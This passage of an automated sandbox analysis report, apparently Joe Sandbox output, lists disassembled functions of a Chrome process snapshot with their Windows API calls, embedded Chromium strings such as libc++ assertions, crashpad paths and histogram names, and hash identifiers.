                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D38700
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00D386A9
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00D380E3, 00D381D0
                                                    • {}-, xrefs: 00D3846C
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00D386A2
                                                    • PERFETTO_CHECK(key), xrefs: 00D3826D
                                                    • ..\..\third_party\perfetto\src\tracing\event_context.cc, xrefs: 00D38229, 00D3825E
                                                    • PERFETTO_CHECK(tls_state_), xrefs: 00D38238
                                                    • %s (errno: %d, %s), xrefs: 00D3823D, 00D38272
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Similarity
                                                    • API ID: ErrorLast$Module$CurrentFreeHandleInfoInformationLibraryProcessSystem
                                                    • String ID: %s (errno: %d, %s)$..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$..\..\third_party\perfetto\src\tracing\event_context.cc$PERFETTO_CHECK(key)$PERFETTO_CHECK(tls_state_)${}-
                                                    • API String ID: 4075626267-2919275849
                                                    • Opcode ID: 929d171d432bb3b22d24d4d197da167c522b001e940d56f9e72a03dfe1e911c2
                                                    • Instruction ID: 5cea5c636d4c7f7e3e2be2ee4bf4a2d7533737cafb8e085439c20b890ac217e2
                                                    • Opcode Fuzzy Hash: 929d171d432bb3b22d24d4d197da167c522b001e940d56f9e72a03dfe1e911c2
                                                    • Instruction Fuzzy Hash: 3C227EB5E003199FDB20DF65D885A9EBBB4FF45300F248129F819BB351EB30A945DBA1
                                                    APIs
                                                    • CreateThread.KERNEL32(00000000,00000000,00D73FE0,00000000,00000000,00000000), ref: 00D48CC1
                                                    • CreateThread.KERNEL32(00000000,00000000,00D73FE0,00000000,00000000,00000000), ref: 00D48D41
                                                      • Part of subcall function 00D49620: VerSetConditionMask.KERNEL32 ref: 00D4968B
                                                      • Part of subcall function 00D49620: VerSetConditionMask.KERNEL32(00000000,?,00000001,00000003), ref: 00D49697
                                                      • Part of subcall function 00D49620: VerSetConditionMask.KERNEL32(00000000,?,00000020,00000003,?,00000001,00000003), ref: 00D496A3
                                                      • Part of subcall function 00D49620: VerifyVersionInfoW.KERNEL32(?,00000023,00000000), ref: 00D496C3
                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00D48D76
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D48DE7
                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00D48E0F
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00D48E1E
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D48E80
                                                    • WaitForSingleObject.KERNEL32(?,-00000001), ref: 00D48F23
                                                    • WaitForSingleObject.KERNEL32(?,-00000001), ref: 00D48F2A
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00D48F30
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D48F67
                                                    • CloseHandle.KERNEL32(?), ref: 00D48F76
                                                    • CloseHandle.KERNEL32(?), ref: 00D48F89
                                                      • Part of subcall function 00E89540: _strlen.LIBCMT ref: 00E89550
                                                      • Part of subcall function 00D491B0: UnregisterWaitEx.KERNEL32(?,-00000001,?,?,?,?,?,00D48DC9), ref: 00D491D1
                                                      • Part of subcall function 00D491B0: UnregisterWaitEx.KERNEL32(?,-00000001,?,?,?,?,?,00D48DC9), ref: 00D491D9
                                                      • Part of subcall function 00D491B0: UnregisterWaitEx.KERNEL32(?,-00000001,?,?,?,?,?,00D48DC9), ref: 00D491E2
                                                      • Part of subcall function 00D491B0: CloseHandle.KERNEL32(?,?,?,?,?,?,00D48DC9), ref: 00D49200
                                                      • Part of subcall function 00D491B0: CloseHandle.KERNEL32(?,CloseHandle,?,?,?,?,?,?,?,?,?,?,?,00D48DC9), ref: 00D4922E
                                                      • Part of subcall function 00D491B0: CloseHandle.KERNEL32(?,CloseHandle,?,?,?,?,?,?,?,?,?,?,?,00D48DC9), ref: 00D49258
                                                      • Part of subcall function 00D491B0: CloseHandle.KERNEL32(?,CloseHandle,?,?,?,?,?,?,?,?,?,?,?,00D48DC9), ref: 00D49282
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Similarity
                                                    • API ID: CloseHandle$ExclusiveLockWait$ConditionMaskReleaseUnregister$AcquireCompletionCreateObjectQueuedSingleStatusThread$InfoVerifyVersion_strlen
                                                    • String ID: ..\..\third_party\crashpad\crashpad\util\win\exception_handler_server.cc$..\..\third_party\crashpad\crashpad\util\win\scoped_handle.cc$CloseHandle$CreateNamedPipe$CreateThread$Free$Run
                                                    • API String ID: 2114208606-1806101671
                                                    • Opcode ID: 37aef64fa82ffaa57cd41fc50b2e6da770a5eb488a8c3b3b9435c890617a147e
                                                    • Instruction ID: 0b592abd183ab7d26f3dff03d89ecc5d250684e7a7b94e9e7708ae00f1ec43e9
                                                    • Opcode Fuzzy Hash: 37aef64fa82ffaa57cd41fc50b2e6da770a5eb488a8c3b3b9435c890617a147e
                                                    • Instruction Fuzzy Hash: D7F1C6B1A043409FC710DF25D88192FB7E5EF99750F08492DF999A7292DB70ED48CBA2
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00E25A5E
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00E26038, 00E265C2
                                                    • ..\..\third_party\libc++\src\include\optional:800: assertion this->has_value() failed: optional operator* called on a disengaged value, xrefs: 00E2603F, 00E265A4
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Similarity
                                                    • API ID: CurrentThread
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$..\..\third_party\libc++\src\include\optional:800: assertion this->has_value() failed: optional operator* called on a disengaged value
                                                    • API String ID: 2882836952-3013800257
                                                    • Opcode ID: 98d6c29038d8fc4607d3a9a9f604ff68b2ced211be4ecba17e339514d82ae61d
                                                    • Instruction ID: 4aa6d0f42c74c36196803d1e3bb44a3f661f672db6b4d35ca09fb7ce8522ef3d
                                                    • Opcode Fuzzy Hash: 98d6c29038d8fc4607d3a9a9f604ff68b2ced211be4ecba17e339514d82ae61d
                                                    • Instruction Fuzzy Hash: 3F725C716083419FC708CF28D59562AFBE6FBC8314F149A2EF899A73A1D770D845CB52
                                                    APIs
                                                    • _strlen.LIBCMT ref: 00E1A5A5
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00E1A791
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00E1A8C7
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00E1AAAC
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00E1AAD5
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00E1AAF8
                                                    • _strlen.LIBCMT ref: 00E1ACF0
                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 00E1AD5F
                                                    Strings
                                                    • Histogram.MismatchedConstructionArguments, xrefs: 00E1AF32
                                                    • T, xrefs: 00E1AE99
                                                    • T, xrefs: 00E1ADB4
                                                    • ..\..\third_party\libc++\src\include\vector:1418: assertion __n < size() failed: vector[] index out of bounds, xrefs: 00E1AFF1
                                                    • Blink.UseCounter, xrefs: 00E1AEE9
                                                    • Histogram.TooManyBuckets.1000, xrefs: 00E1AED8
                                                    • T, xrefs: 00E1ADE3
                                                    • ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 00E1AF4F
                                                    • Histogram.BadConstructionArguments, xrefs: 00E1AF7C
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireRelease$_strlen
                                                    • String ID: ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length$..\..\third_party\libc++\src\include\vector:1418: assertion __n < size() failed: vector[] index out of bounds$Blink.UseCounter$Histogram.BadConstructionArguments$Histogram.MismatchedConstructionArguments$Histogram.TooManyBuckets.1000$T$T$T
                                                    • API String ID: 1657474455-705546750
                                                    • Opcode ID: d006eda63b6d7a583f3241fceceaa6003529afe26fefb668887b39ac24a40f02
                                                    • Instruction ID: 96dc336a1fc0f3e2f8395fb15679b555d2660a9cb7860e419a4a9014c0db452a
                                                    • Opcode Fuzzy Hash: d006eda63b6d7a583f3241fceceaa6003529afe26fefb668887b39ac24a40f02
                                                    • Instruction Fuzzy Hash: 8052A275E012148FDB24CF24D8817FDB7B6AB89314F199069E80ABB352D731ADC5CB92
                                                    APIs
                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00DB5F03
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DB5F40
                                                    • TryAcquireSRWLockExclusive.KERNEL32(00000000), ref: 00DB5FE9
                                                    • ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?), ref: 00DB60E0
                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00DB61B0
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DB61ED
                                                    • AcquireSRWLockExclusive.KERNEL32(00000000), ref: 00DB622F
                                                    Strings
                                                    • @KL, xrefs: 00DB6270
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00DB62E6
                                                    • ..\..\third_party\libc++\src\include\optional:800: assertion this->has_value() failed: optional operator* called on a disengaged value, xrefs: 00DB6829
                                                    • @KL, xrefs: 00DB62A2
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireCounterPerformanceQueryUnothrow_t@std@@@__ehfuncinfo$??2@$Release
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$..\..\third_party\libc++\src\include\optional:800: assertion this->has_value() failed: optional operator* called on a disengaged value$@KL$@KL
                                                    • API String ID: 2252595807-3005847224
                                                    • Opcode ID: f3cb063b4655d6aeede8bb46de1fd72e5744bcf87e0e717466e11015c77ead9c
                                                    • Instruction ID: f5e2185064cefcf4bb23854a0d489049cce7b237a4225f41028e6029664be22a
                                                    • Opcode Fuzzy Hash: f3cb063b4655d6aeede8bb46de1fd72e5744bcf87e0e717466e11015c77ead9c
                                                    • Instruction Fuzzy Hash: 02729271A04740CFDB19CF18D481AAAB7E5FF88300F09896DE98A5B366D734ED45CBA1
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00DB832D
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00DB8414
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DB8728
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DB8741
                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 00DB875A
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DB877E
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DB878F
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DB87A0
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DB87B1
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DB87C2
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DB87D3
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DB87E7
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DB87F9
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DB884F
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DB8860
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DB8879
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DB888A
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DB88A3
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DB88E7
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Similarity
                                                    • API ID: CurrentThread$ExclusiveLock$Acquire$Release
                                                    • String ID:
                                                    • API String ID: 1097530104-0
                                                    • Opcode ID: df484071b1b25121535674bfa8abf98102f6ee9d9e298df193420aa37a6c36cf
                                                    • Instruction ID: 383043c70319a1b6b6989ee8a55438927ffc0d8c527444b84dea8a30a0e5da51
                                                    • Opcode Fuzzy Hash: df484071b1b25121535674bfa8abf98102f6ee9d9e298df193420aa37a6c36cf
                                                    • Instruction Fuzzy Hash: A2322935E0021ACFCB14CF68C4846EAF7B6BF88310F298569D856BB351DB30AD45DBA1
                                                    APIs
                                                    • _strlen.LIBCMT ref: 00DF10B5
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00DF123C
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00DF1372
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00DF1508
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00DF1534
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00DF1557
                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 00DF17D2
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00DF1968
                                                    Strings
                                                    • T, xrefs: 00DF1806
                                                    • Histogram.MismatchedConstructionArguments, xrefs: 00DF192E
                                                    • ..\..\third_party\libc++\src\include\vector:1418: assertion __n < size() failed: vector[] index out of bounds, xrefs: 00DF1994
                                                    • T, xrefs: 00DF18E8
                                                    • ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 00DF190A
                                                    • T, xrefs: 00DF1835
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$Release$Acquire$_strlen
                                                    • String ID: ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length$..\..\third_party\libc++\src\include\vector:1418: assertion __n < size() failed: vector[] index out of bounds$Histogram.MismatchedConstructionArguments$T$T$T
                                                    • API String ID: 576647242-436863712
                                                    • Opcode ID: ec15527c65858c12fc6c220ceb79a5302b85035eb076511006d1d9ac8be4313c
                                                    • Instruction ID: 9845c80b10f005aa660a114e91429406434141ed1ec5fdd43d147935421f9d0f
                                                    • Opcode Fuzzy Hash: ec15527c65858c12fc6c220ceb79a5302b85035eb076511006d1d9ac8be4313c
                                                    • Instruction Fuzzy Hash: 1452D379E00259DFDB14CF64D881A7DB7B6BF85300F19C069EA4AAB352D730AD45CBA0
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00DBE850
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00DBEB12
                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,00000010,?,00004000,?,00000000), ref: 00DBEBD1
                                                      • Part of subcall function 00DA8000: ReleaseSRWLockExclusive.KERNEL32(?,?,00000021,?,00004000,?,000000FF), ref: 00DA8170
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00DBECEA
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00DBED75
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00DBE889
                                                      • Part of subcall function 00DA8000: TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00DA8047
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireRelease
                                                    • String ID: first$second
                                                    • API String ID: 17069307-3095674784
                                                    • Opcode ID: 860d25c2bf0cb7beec946b2188113302100ff04a62d9efab5cb5b4658f5e5bd9
                                                    • Instruction ID: 0dcf8f21f04ded86fa0698134f8a4ab378d6388338371fe223e4c554bc38cc30
                                                    • Opcode Fuzzy Hash: 860d25c2bf0cb7beec946b2188113302100ff04a62d9efab5cb5b4658f5e5bd9
                                                    • Instruction Fuzzy Hash: 2182C375604741DFD718DF24C884BAAB7E2FF88314F19866DE88A5B292D730EC45CBA1
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?,?,F1645913), ref: 00DB39CB
                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,?,F1645913), ref: 00DB3B6A
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\vector:1411: assertion __n < size() failed: vector[] index out of bounds, xrefs: 00DB4AB6
                                                    • T, xrefs: 00DB4A6E
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00DB4AC5
                                                    • ..\..\third_party\libc++\src\include\vector:1418: assertion __n < size() failed: vector[] index out of bounds, xrefs: 00DB4AD4
                                                    • 1U!S, xrefs: 00DB3C3B
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at, xrefs: 00DB4AE3
                                                    • 1U!S, xrefs: 00DB3CBD
                                                    • T, xrefs: 00DB4A40
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireRelease
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at$..\..\third_party\libc++\src\include\vector:1411: assertion __n < size() failed: vector[] index out of bounds$..\..\third_party\libc++\src\include\vector:1418: assertion __n < size() failed: vector[] index out of bounds$1U!S$1U!S$T$T
                                                    • API String ID: 17069307-503978395
                                                    • Opcode ID: 2f0c108981a825e881a83581b96485934949ed74d1e7dbea8659432ee6e4e38e
                                                    • Instruction ID: 1a8a7267849412969f0c0b3842f7ed04f909c442c618f3e9c2eeb7a930e912d2
                                                    • Opcode Fuzzy Hash: 2f0c108981a825e881a83581b96485934949ed74d1e7dbea8659432ee6e4e38e
                                                    • Instruction Fuzzy Hash: AEA28075E00215CFDB24CF28D8907A9B7B2FF85304F198699D94AAB346DB30AD85CF61
                                                    APIs
                                                    • VerSetConditionMask.KERNEL32 ref: 00D4968B
                                                    • VerSetConditionMask.KERNEL32(00000000,?,00000001,00000003), ref: 00D49697
                                                    • VerSetConditionMask.KERNEL32(00000000,?,00000020,00000003,?,00000001,00000003), ref: 00D496A3
                                                    • VerifyVersionInfoW.KERNEL32(?,00000023,00000000), ref: 00D496C3
                                                    • LocalFree.KERNEL32(?), ref: 00D497FF
                                                    • CreateNamedPipeW.KERNEL32 ref: 00D4987A
                                                    • SetLastError.KERNEL32(00000000), ref: 00D49915
                                                      • Part of subcall function 00E282C8: AcquireSRWLockExclusive.KERNEL32(00EF2800,000000C0,?,?,00DBFE69,00F02A10), ref: 00E282D3
                                                      • Part of subcall function 00E282C8: ReleaseSRWLockExclusive.KERNEL32(00EF2800,?,00DBFE69,00F02A10), ref: 00E2830D
                                                    Strings
                                                    • ..\..\third_party\crashpad\crashpad\util\win\registration_protocol_win.cc, xrefs: 00D498BD, 00D4993A
                                                    • ConvertStringSecurityDescriptorToSecurityDescriptor, xrefs: 00D498CF
                                                    • LocalFree, xrefs: 00D498FA
                                                    • ..\..\third_party\crashpad\crashpad\util\win\scoped_local_alloc.cc, xrefs: 00D498E8
                                                    • BuildSecurityDescriptor, xrefs: 00D4994C
                                                    • D:(A;;GA;;;SY)(A;;GWGR;;;S-1-15-2-1)S:(ML;;;;;S-1-16-0), xrefs: 00D4974E
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ConditionMask$ExclusiveLock$AcquireCreateErrorFreeInfoLastLocalNamedPipeReleaseVerifyVersion
                                                    • String ID: ..\..\third_party\crashpad\crashpad\util\win\registration_protocol_win.cc$..\..\third_party\crashpad\crashpad\util\win\scoped_local_alloc.cc$BuildSecurityDescriptor$ConvertStringSecurityDescriptorToSecurityDescriptor$D:(A;;GA;;;SY)(A;;GWGR;;;S-1-15-2-1)S:(ML;;;;;S-1-16-0)$LocalFree
                                                    • API String ID: 2435325764-909682083
                                                    • Opcode ID: d35de8fa3ac1dd75f66b340c18b2ec33b053e045c5d059bd1b82f1415414af2c
                                                    • Instruction ID: 4c9438afb06d18c3e4117d39719429ac8251474ee4a1982628a955737d35cdbf
                                                    • Opcode Fuzzy Hash: d35de8fa3ac1dd75f66b340c18b2ec33b053e045c5d059bd1b82f1415414af2c
                                                    • Instruction Fuzzy Hash: 758184B1A003599FE714DF16DC55BAAB7B8FB85700F0441A9F5087B291DB709E48CB61
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00DF9840
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00DF9863
                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 00DF9B51
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00DF9CC4
                                                      • Part of subcall function 00DB75E0: _strlen.LIBCMT ref: 00DB75FF
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\vector:1411: assertion __n < size() failed: vector[] index out of bounds, xrefs: 00DF9C19
                                                    • Histogram.MismatchedConstructionArguments, xrefs: 00DF9C4B
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00DF9C12
                                                    • Blink.UseCounter, xrefs: 00DF9BE2
                                                    • 0Q, xrefs: 00DF9772, 00DF9B5C
                                                    • T, xrefs: 00DF9BB6
                                                    • Histogram.TooManyBuckets.1000, xrefs: 00DF9BD1
                                                    • Histogram.BadConstructionArguments, xrefs: 00DF9C33
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireRelease$_strlen
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$..\..\third_party\libc++\src\include\vector:1411: assertion __n < size() failed: vector[] index out of bounds$0Q$Blink.UseCounter$Histogram.BadConstructionArguments$Histogram.MismatchedConstructionArguments$Histogram.TooManyBuckets.1000$T
                                                    • API String ID: 1657474455-3477605054
                                                    • Opcode ID: fa6383063139e310abdf789931fe2ef95f983b2aa7c27c853c1179cf0b752dc1
                                                    • Instruction ID: cec0c05521afcc53e7f84c0057399808f517fccb8407410e6d2bb71d304464ab
                                                    • Opcode Fuzzy Hash: fa6383063139e310abdf789931fe2ef95f983b2aa7c27c853c1179cf0b752dc1
                                                    • Instruction Fuzzy Hash: FEF1D571A043449FCB11DF24D89163AF7E6EF88350F1A851DFA8AAB351DB31D845CBA1
                                                    Strings
                                                    • Histogram.MismatchedConstructionArguments, xrefs: 00DF1DD6
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00DF1D56
                                                    • ..\..\third_party\libc++\src\include\vector:1418: assertion __n < size() failed: vector[] index out of bounds, xrefs: 00DF1E1F
                                                    • Blink.UseCounter, xrefs: 00DF1D22
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00DF1D4F
                                                    • Histogram.TooManyBuckets.1000, xrefs: 00DF1D11
                                                    • T, xrefs: 00DF1CEF
                                                    • Histogram.BadConstructionArguments, xrefs: 00DF1DFC
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$..\..\third_party\libc++\src\include\vector:1418: assertion __n < size() failed: vector[] index out of bounds$Blink.UseCounter$Histogram.BadConstructionArguments$Histogram.MismatchedConstructionArguments$Histogram.TooManyBuckets.1000$T
                                                    • API String ID: 0-2072873490
                                                    • Opcode ID: 62312220ab03aeceb6d6eec92d833eb6884dcacae6e656c450405808de93a792
                                                    • Instruction ID: 281306ecc286e3a5011638ffcc430de3835dab5ef48ce6f760c758876d00aaea
                                                    • Opcode Fuzzy Hash: 62312220ab03aeceb6d6eec92d833eb6884dcacae6e656c450405808de93a792
                                                    • Instruction Fuzzy Hash: F7C16079A00209DFCB14DF65DC859BDB7B6EF88310F1A8029E916B7351EB31AD06CB61
                                                    APIs
                                                    • CreateFileMappingW.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00D326B9
                                                    • GetLastError.KERNEL32 ref: 00D326CA
                                                    • SetLastError.KERNEL32(00000000), ref: 00D326F6
                                                    • MapViewOfFile.KERNEL32(?,?,00000000,00000000,00000000), ref: 00D32754
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLast$CreateMappingView
                                                    • String ID: ..\..\base\files\memory_mapped_file_win.cc$GetHandleVerifier$MapFileRegionToMemory$MapImageToMemory$ScopedBlockingCall
                                                    • API String ID: 2231327692-1444722369
                                                    • Opcode ID: 62aaa49acbc55ba729e47bbdde459a288a352ad990ab1037d5c8226a23fa0aea
                                                    • Instruction ID: 67c5d67942aa560065f359ac376ecab30f0006aa131634feb73cae27b4bbd345
                                                    • Opcode Fuzzy Hash: 62aaa49acbc55ba729e47bbdde459a288a352ad990ab1037d5c8226a23fa0aea
                                                    • Instruction Fuzzy Hash: 43A1DFB1A043409FC714DF25C88573BB7E5FF89310F14892DF986AB291D7B0A949CBA2
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00DF2818,?), ref: 00DB280D
                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00DF2818,?), ref: 00DB2985
                                                    • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00DF2818,?), ref: 00DB2BDF
                                                    • __floor_pentium4.LIBCMT ref: 00DB2CE3
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00DB2C98
                                                    • T, xrefs: 00DB2C34
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at, xrefs: 00DB2C84
                                                    • ), xrefs: 00DB2C70
                                                    • T, xrefs: 00DB2C61
                                                    Memory Dump Source
